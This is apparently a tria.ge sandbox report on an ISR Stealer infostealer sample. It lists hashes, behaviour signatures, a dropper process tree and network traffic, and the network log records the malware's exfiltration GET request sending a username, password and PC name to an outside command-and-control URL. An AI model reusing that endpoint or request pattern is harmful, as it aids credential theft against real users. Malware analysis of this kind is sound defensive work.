Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    141s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    13/03/2024, 03:07 UTC

General

  • Target

    c4d20a36d9f0e1ca758818b3be981779.exe

  • Size

    606KB

  • MD5

    c4d20a36d9f0e1ca758818b3be981779

  • SHA1

    2d55fcb91c41aa7d63f240fc1c5a49c919cc4487

  • SHA256

    1fbf779d7f1d4dfe9cd3f7c84c6e5763bb77530acc11732563e7abaeaba65a93

  • SHA512

    e926955240c20b52d885a3471bd422cf0903e49260595419cdef1851676539b84379c1a6959a8ef9452352035f443052886d0a10c913da91824a0a0ae5e77ffe

  • SSDEEP

    12288:DrVRbtxoNY4psjC6bswqW4jV//1iVs9odGn:DrFuJVMFMie9odO

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

  • ISR Stealer payload 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 6 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c4d20a36d9f0e1ca758818b3be981779.exe
    "C:\Users\Admin\AppData\Local\Temp\c4d20a36d9f0e1ca758818b3be981779.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2340
    • C:\Users\Admin\AppData\Local\Temp\tmp1.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Users\Admin\AppData\Local\Temp\tmp1.EXE
        "C:\Users\Admin\AppData\Local\Temp\tmp1.EXE"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:2720
    • C:\Users\Admin\AppData\Local\Temp\tmp2.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp2.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Users\Admin\AppData\Local\Temp\tmp2.EXE
        "C:\Users\Admin\AppData\Local\Temp\tmp2.EXE"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        PID:2524

Network

  • flag-us
    DNS
    ljcp.gov.pk
    tmp1.EXE
    Remote address:
    8.8.8.8:53
    Request
    ljcp.gov.pk
    IN A
    Response
    ljcp.gov.pk
    IN A
    175.107.60.195
  • flag-us
    DNS
    www.mymobilewap.info
    tmp2.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.mymobilewap.info
    IN A
    Response
  • flag-us
    DNS
    www.mymobilewap.info
    tmp2.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.mymobilewap.info
    IN A
    Response
  • flag-pk
    GET
    http://ljcp.gov.pk/tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft
    tmp1.EXE
    Remote address:
    175.107.60.195:80
    Request
    GET /tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft HTTP/1.1
    User-Agent: HardCore Software For : Public
    Host: ljcp.gov.pk
  • 175.107.60.195:80
    http://ljcp.gov.pk/tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft
    http
    tmp1.EXE
    532 B
    212 B
    7
    5

    HTTP Request

    GET http://ljcp.gov.pk/tools47/index.php?action=add&username=Admin&password=D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV&app=Windows&pcname=SCFGBRBT&sitename=Microsoft
  • 8.8.8.8:53
    ljcp.gov.pk
    dns
    tmp1.EXE
    57 B
    73 B
    1
    1

    DNS Request

    ljcp.gov.pk

    DNS Response

    175.107.60.195

  • 8.8.8.8:53
    www.mymobilewap.info
    dns
    tmp2.EXE
    132 B
    290 B
    2
    2

    DNS Request

    www.mymobilewap.info

    DNS Request

    www.mymobilewap.info

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp2.exe

    Filesize

    216KB

    MD5

    f0c93f442042bbbe985674d671191ed3

    SHA1

    a9ebbe67032eec48673b42325682859ce06a5e2c

    SHA256

    9708ceb9b7f76534315948101b2c8493d0c96e8205eee25e7b8a5473f65b997e

    SHA512

    7e8978c682d0e735f8f7bc16d1fb99136e927c7dc1d6e0fe5be41f0ec0808af9203bf146653f9fe4ac806c91f532144f5b27ac2b9adcb7b3876d4ab02a75e776

  • \Users\Admin\AppData\Local\Temp\tmp1.exe

    Filesize

    156KB

    MD5

    c1cfb778cbfe135b6fb0d2b6b9116b38

    SHA1

    f90af1a915f603a6acc40c18a5d9e8e6eef8d015

    SHA256

    b5d32c93e9a815f775489aa2b0ab1f86d45821df344916237746557062d7e8fb

    SHA512

    8ca72c995233c5c14eb9d1b6d6b1b70f72f03acbfb578743b0da8bce03b36d0d2d7e005feefb2fffd55f803e41f9e17b5be8ccc5a333a34d426545fbb6443b0a

  • memory/2340-0-0x0000000000400000-0x000000000043C000-memory.dmp

    Filesize

    240KB

  • memory/2340-27-0x0000000000400000-0x000000000043C000-memory.dmp

    Filesize

    240KB

  • memory/2524-32-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2524-39-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2524-41-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2524-43-0x0000000000400000-0x0000000000429000-memory.dmp

    Filesize

    164KB

  • memory/2720-31-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

  • memory/2720-45-0x0000000000400000-0x0000000000414000-memory.dmp

    Filesize

    80KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.